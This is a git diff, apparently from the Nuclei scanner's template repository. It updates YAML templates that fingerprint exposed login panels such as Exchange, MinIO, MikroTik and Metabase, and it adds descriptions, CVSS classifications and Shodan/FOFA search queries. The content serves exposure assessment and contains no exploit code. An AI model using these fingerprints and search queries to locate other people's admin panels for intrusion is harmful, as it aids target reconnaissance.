- https://github.com/mailhog/MailHog
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"mailhog"
|
||||
|
@ -30,3 +34,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: mailwatch-login
|
||||
|
||||
info:
|
||||
name: MailWatch Login Page
|
||||
name: MailWatch Login Panel - Detect
|
||||
author: oppsec
|
||||
severity: info
|
||||
description: MailWatch login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"MailWatch Login Page"
|
||||
|
@ -26,3 +31,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,11 +1,16 @@
|
|||
id: mantisbt-panel
|
||||
|
||||
info:
|
||||
name: MantisBT Login Panel
|
||||
name: MantisBT Login Panel - Detect
|
||||
author: makyotox,daffainfo
|
||||
severity: info
|
||||
description: MantisBT login panel was detected.
|
||||
reference:
|
||||
- https://www.mantisbt.org/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.favicon.hash:662709064
|
||||
|
@ -28,3 +33,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,10 +1,14 @@
|
|||
id: matomo-login-portal
|
||||
|
||||
info:
|
||||
name: Matomo Login Portal
|
||||
name: Matomo Login Panel - Detect
|
||||
author: Arr0way
|
||||
severity: info
|
||||
description: Matomo provides website analytics
|
||||
description: Matomo logjn panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,matomo
|
||||
|
||||
requests:
|
||||
|
@ -23,3 +27,5 @@ requests:
|
|||
- "Sign in"
|
||||
- "Matomo"
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: mcloud-panel
|
||||
|
||||
info:
|
||||
name: MCloud Panel Exposure
|
||||
name: mCloud Login Panel - Detect
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
description: mCloud login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"mcloud-installer-web"
|
||||
|
@ -24,3 +29,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: meshcentral-login
|
||||
|
||||
info:
|
||||
name: MeshCentral - Login
|
||||
name: MeshCentral Login Panel - Detect
|
||||
author: dhiyaneshDk
|
||||
severity: info
|
||||
description: MeshCentral login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.title:"MeshCentral - Login"
|
||||
tags: panel,meshcentral
|
||||
|
@ -23,3 +28,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,10 +1,14 @@
|
|||
id: metabase-panel
|
||||
|
||||
info:
|
||||
name: Metabase Login Panel
|
||||
name: Metabase Login Panel - Detect
|
||||
author: revblock,daffainfo
|
||||
severity: info
|
||||
description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source
|
||||
description: Metabase login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.title:"Metabase"
|
||||
tags: panel,metabase,login
|
||||
|
@ -34,3 +38,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- '"(v\d+.\d+.\d+)"'
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,11 +1,16 @@
|
|||
id: metersphere-login
|
||||
|
||||
info:
|
||||
name: Metersphere Login
|
||||
name: MeterSphere Login Panel - Detect
|
||||
author: pdteam
|
||||
severity: info
|
||||
description: MeterSphere login panel was detected.
|
||||
reference:
|
||||
- https://github.com/metersphere/metersphere
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,metersphere
|
||||
|
||||
requests:
|
||||
|
@ -33,3 +38,5 @@ requests:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- "contains(tolower(all_headers), 'ms_session_id')"
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,11 +1,16 @@
|
|||
id: mfiles-web-detect
|
||||
|
||||
info:
|
||||
name: M-Files Web Panel Detect
|
||||
name: M-Files Web Login Panel - Detect
|
||||
author: Nodauf
|
||||
severity: info
|
||||
description: M-Files Web login panel was detected.
|
||||
reference:
|
||||
- https://www.m-files.com/about/trust-center/security-advisories/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"M-Files Web"
|
||||
|
@ -31,3 +36,5 @@ requests:
|
|||
- 'M-Files user'
|
||||
- 'M-Files authentication'
|
||||
condition: or
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: microfocus-filr-panel
|
||||
|
||||
info:
|
||||
name: Micro Focus Filr Panel
|
||||
name: Micro Focus Filr Login Panel - Detect
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
description: Micro Focus Filr login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"Micro Focus Filr"
|
||||
|
@ -24,3 +29,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 404
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: microfocus-vibe-panel
|
||||
|
||||
info:
|
||||
name: Micro Focus Vibe Login Panel
|
||||
name: Micro Focus Vibe Login Panel - Detect
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
description: Micro Focus Vibe login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"Micro Focus Vibe"
|
||||
|
@ -28,3 +33,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,12 +1,16 @@
|
|||
id: microsoft-exchange-panel
|
||||
|
||||
info:
|
||||
name: Microsoft Exchange Control Panel
|
||||
name: Microsoft Exchange Admin Center Login Panel - Detect
|
||||
author: r3dg33k
|
||||
severity: info
|
||||
description: Publicly accessible Microsoft Exchange Server Control Panel
|
||||
description: Microsoft Exchange Admin Center login panel was detected.
|
||||
reference:
|
||||
- https://docs.microsoft.com/en-us/answers/questions/58814/block-microsoft-exchange-server-2016-exchange-admi.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: microsoft,panel,exchange
|
||||
|
||||
requests:
|
||||
|
@ -23,3 +27,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- 'Exchange Admin Center'
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -0,0 +1,29 @@
|
|||
id: mikrotik-routeros-old
|
||||
|
||||
info:
|
||||
name: MikroTik RouterOS Administration Login
|
||||
author: its0x08,DhiyaneshDk
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"mikrotik routeros > administration"
|
||||
tags: panel,login,mikrotik
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'mikrotik routeros > administration'
|
||||
- 'configuration page'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
- '<div class="top">mikrotik routeros (.[0-9.]+) configuration page</div>'
|
|
@ -1,11 +1,16 @@
|
|||
id: mikrotik-routeros
|
||||
|
||||
info:
|
||||
name: MikroTik RouterOS Login
|
||||
name: MikroTik Router OS - Login Panel Detect
|
||||
author: gy741
|
||||
severity: info
|
||||
description: MikroTik Router OS login panel was detected.
|
||||
reference:
|
||||
- https://systemweakness.com/routeros-user-with-just-ftp-policy-can-write-to-filesystem-cve-2021-27221-e3e45d780dfe
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,login
|
||||
|
||||
requests:
|
||||
|
@ -20,6 +25,9 @@ requests:
|
|||
- 'If this device is not in your possession, please contact your local network administrator'
|
||||
- '.mikrotik.com'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
|
@ -1,11 +1,16 @@
|
|||
id: mini-start-page
|
||||
|
||||
info:
|
||||
name: Miniweb Start Page
|
||||
name: Miniweb Start Page Login Panel - Detect
|
||||
author: dhiyaneshDk
|
||||
severity: info
|
||||
description: Miniweb Start Page login panel was detected.
|
||||
reference:
|
||||
- https://www.exploit-db.com/ghdb/6500
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: edb,panel
|
||||
|
||||
requests:
|
||||
|
@ -22,3 +27,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: minio-browser
|
||||
|
||||
info:
|
||||
name: MinIO Browser
|
||||
name: MinIO Browser Login Panel - Detect
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
description: MinIO Browser login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: title:"MinIO Browser"
|
||||
tags: panel,minio
|
||||
|
@ -22,3 +27,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: minio-console
|
||||
|
||||
info:
|
||||
name: MinIO Console
|
||||
name: MinIO Console Login Panel - Detect
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: MinIO Console login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,minio
|
||||
metadata:
|
||||
fofa-query: app="MinIO-Console"
|
||||
|
@ -24,3 +29,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/29
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: mitel-panel-detect
|
||||
|
||||
info:
|
||||
name: Mitel Panel Detect
|
||||
name: Mitel Login Panel - Detect
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
description: Mitel login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"Mitel Networks"
|
||||
|
@ -28,3 +33,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/29
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: mobile-management-panel
|
||||
|
||||
info:
|
||||
name: Mobile Management Platform Panel Detect
|
||||
name: Mobile Management Platform Panel - Detect
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
description: Mobile Management Platform panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: title="移动管理平台-企业管理"
|
||||
|
@ -33,3 +38,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- 'version = "(.*)"'
|
||||
|
||||
# Enhanced by md on 2022/11/29
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: mobileiron-login
|
||||
|
||||
info:
|
||||
name: MobileIron Login
|
||||
name: MobileIron Login Panel - Detect
|
||||
author: dhiyaneshDK,dwisiswant0
|
||||
severity: info
|
||||
description: MobileIron login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,mobileiron
|
||||
|
||||
requests:
|
||||
|
@ -23,3 +28,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/29
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: mongodb-ops-manager
|
||||
|
||||
info:
|
||||
name: MongoDB Ops Manager
|
||||
name: MongoDB Ops Manager Login Panel - Detect
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
description: MongoDB Ops Manager login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.title:"MongoDB Ops Manager"
|
||||
tags: panel,mongodb
|
||||
|
@ -21,3 +26,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/29
|
||||
|
|
|
@ -1,12 +1,16 @@
|
|||
id: monitorix-exposure
|
||||
|
||||
info:
|
||||
name: Monitorix
|
||||
name: Monitorix Panel - Detect
|
||||
author: geeknik
|
||||
severity: low
|
||||
description: Monitorix is a free, open source, lightweight system monitoring tool designed to monitor as many services and system resources as possible.
|
||||
description: Monitorix panel was detected.
|
||||
reference:
|
||||
- https://www.monitorix.org/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: monitorix,exposure,logs,panel
|
||||
|
||||
requests:
|
||||
|
@ -28,3 +32,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/29
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue